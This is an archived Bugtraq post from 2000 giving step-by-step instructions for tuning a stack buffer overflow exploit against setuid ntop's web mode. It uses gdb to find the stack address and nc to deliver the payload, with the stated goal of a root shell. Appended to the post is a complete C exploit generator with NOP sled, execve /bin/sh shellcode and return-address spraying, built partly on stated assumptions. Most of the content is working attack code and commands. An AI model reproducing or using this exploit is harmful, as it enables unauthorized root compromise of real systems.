[17367] in bugtraq
How to find ntop -w esp value.
daemon@ATHENA.MIT.EDU (JW Oh)
Thu Oct 26 16:11:40 2000
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=EUC-KR
Content-Transfer-Encoding: 8BIT
Message-ID: <Pine.LNX.4.10.10010261331440.27783-100000@ivntech.com>
Date: Thu, 26 Oct 2000 13:32:41 +0900
Reply-To: mat@IVNTECH.COM
From: JW Oh <mat@IVNTECH.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
1. [on victim host] First modify the ntop-1.2a1 source so that it runs without root privilege, and compile it.
ntop.c:362 (the leading "0 &&" is the inserted change):
if((0 && (rFileName == NULL) && (getuid () && geteuid ()) || setuid (0)) ){
2. [on local host] Run "tcpdump -w somefile" to capture a tcpdump file to feed to ntop, and copy it to the victim host.
3. [on victim host] Run the following with the modified ntop:
$ ./ntop -w 8080 -f somefile
Warning: unable to read file '.ntop'. No security will be used!
Waiting for HTTP connections on port 8080...
4. [on victim host] Attach gdb to the ntop process and set a breakpoint on the function returnHTTPPage:
$ gdb ./ntop 2634
(gdb) break returnHTTPPage
Breakpoint 1 at 0x8051350
(gdb) cont
Continuing.
[Switching to Thread 28851]
5. [on local host] Run the exploit against the victim host:
$ ./ntop-w-exp | nc victim 8080
6. [on victim host] gdb stops at the returnHTTPPage breakpoint. Set a breakpoint on the function strcpy and continue; gdb then stops at the strcpy breakpoint. The value of "dest=0xbefffb00" is the stack location we will use as the esp value:
Breakpoint 1, 0x8051350 in returnHTTPPage ()
(gdb) break strcpy
Breakpoint 2 at 0x400c842a: file ../sysdeps/generic/strcpy.c, line 33.
(gdb) cont
Continuing.
Breakpoint 2, strcpy (dest=0xbefffb00 "$ý¡¾±\017\005\b\b",
src=0x8091dc1 '\220' <repeats 50 times>, "<execve /bin/sh shellcode, then the return address repeated; the bytes are garbled by the archive's charset>"...) at ../sysdeps/generic/strcpy.c:33
(gdb) cont
Continuing.
7. [on victim host] Now kill the modified ntop and run the setuid ntop:
$ /usr/local/sbin/ntop -w 8080
8. [on local host] Modify the esp value in ntop-w-exp.c and run the exploit. You can set the offset with the first argument to ntop-w-exp. I think the offset must be a negative value.
$ ./ntop-w-exp | nc victim 8080
9. [on victim host] You will get a root shell.
=================================================
| |
| mat@hacksware.com |
| |
=================================================
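As an added example (not the ntop-w-exp.c from the post, which is not reproduced on this page), the following C program builds the buffer layout visible in the strcpy() dump above: a 50-byte NOP sled, an execve("/bin/sh") shellcode, then the chosen stack address repeated to the end of the buffer, with the address taken as the gdb value 0xbefffb00 plus the offset given as the first argument. Two points the post leaves implicit are handled: because the overwrite happens through strcpy(), the address must contain no zero byte (0xbefffb00 itself ends in 0x00, which is one reason a non-zero offset is needed), and the 4-byte alignment of the repeated address relative to the saved return address is unknown, so a second argument shifts it. Assumptions not stated on the page: the total buffer length (600), that the overflowed string is the request path of a GET line, and the shellcode bytes (the classic Aleph One execve shellcode, with which the garbled dump is consistent).

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define GDB_ESP     0xbefffb00u   /* dest= value read at the strcpy breakpoint */
#define NOP         0x90          /* x86 nop; the dump shows '\220' <repeats 50 times> */
#define NOP_LEN     50
#define PAYLOAD_LEN 600           /* assumption: the page does not give the buffer size */

/* Classic execve("/bin/sh") shellcode (Aleph One); assumed here, the garbled
 * dump is consistent with it.  It contains no NUL byte, which strcpy() requires. */
static const unsigned char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)

/* Store v little-endian, the byte order in which a saved EIP sits on an x86 stack. */
static void put_le32(unsigned char *p, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        p[i] = (unsigned char)(v >> (8 * i));
}

/* 1 if any byte of v is zero: strcpy() would stop copying at that byte. */
static int has_nul_byte(uint32_t v)
{
    for (int i = 0; i < 4; i++)
        if (((v >> (8 * i)) & 0xff) == 0)
            return 1;
    return 0;
}

/* Number of zero bytes in buf[0..len); must be 0 for the whole payload to be copied. */
static size_t count_nul(const unsigned char *buf, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0)
            n++;
    return n;
}

/* Fill out[0..out_len) with ret repeated every 4 bytes starting at offset
 * align (0..3), then overlay the NOP sled and shellcode at the start, so
 * whichever 4-byte slot lands on the saved return address holds ret and
 * execution slides through the NOPs into the shellcode.
 * Returns out_len, or -1 if ret has a NUL byte, align is out of range, or
 * the buffer is too small. */
static int build_payload(unsigned char *out, size_t out_len, uint32_t ret, unsigned align)
{
    if (has_nul_byte(ret) || align > 3 || out_len < NOP_LEN + SHELLCODE_LEN + 8)
        return -1;
    memset(out, NOP, out_len);                    /* leftover tail bytes stay NOP, never 0 */
    for (size_t pos = align; pos + 4 <= out_len; pos += 4)
        put_le32(out + pos, ret);
    memset(out, NOP, NOP_LEN);
    memcpy(out + NOP_LEN, shellcode, SHELLCODE_LEN);
    return (int)out_len;
}

/* Usage: ./ntop-w-exp [offset] [align] | nc victim 8080
 * offset (first argument, may be negative) is added to GDB_ESP; align shifts
 * the repeated address by 0..3 bytes if an attempt only crashes ntop. */
int main(int argc, char **argv)
{
    long offset = argc > 1 ? strtol(argv[1], NULL, 0) : 0;
    unsigned align = argc > 2 ? (unsigned)strtoul(argv[2], NULL, 0) : 0;
    uint32_t ret = (uint32_t)(GDB_ESP + offset);
    unsigned char buf[PAYLOAD_LEN];

    int len = build_payload(buf, sizeof buf, ret, align);
    if (len < 0) {
        fprintf(stderr, "0x%08x unusable (NUL byte) or bad align; try another offset\n", ret);
        return 1;
    }
    /* Assumption: the overflowed string is the request path; the post does not
     * show the request format ntop-w-exp sends. */
    fputs("GET /", stdout);
    fwrite(buf, 1, (size_t)len, stdout);
    fputs(" HTTP/1.0\r\n\r\n", stdout);
    return 0;
}
```

The program refuses an address such as 0xbefffb00 outright rather than emitting a payload that strcpy() would truncate after the first address byte; with an offset of -8 the address becomes 0xbefffaf8, which has no zero byte and still points inside the 50-byte NOP sled if the buffer lands where gdb showed it.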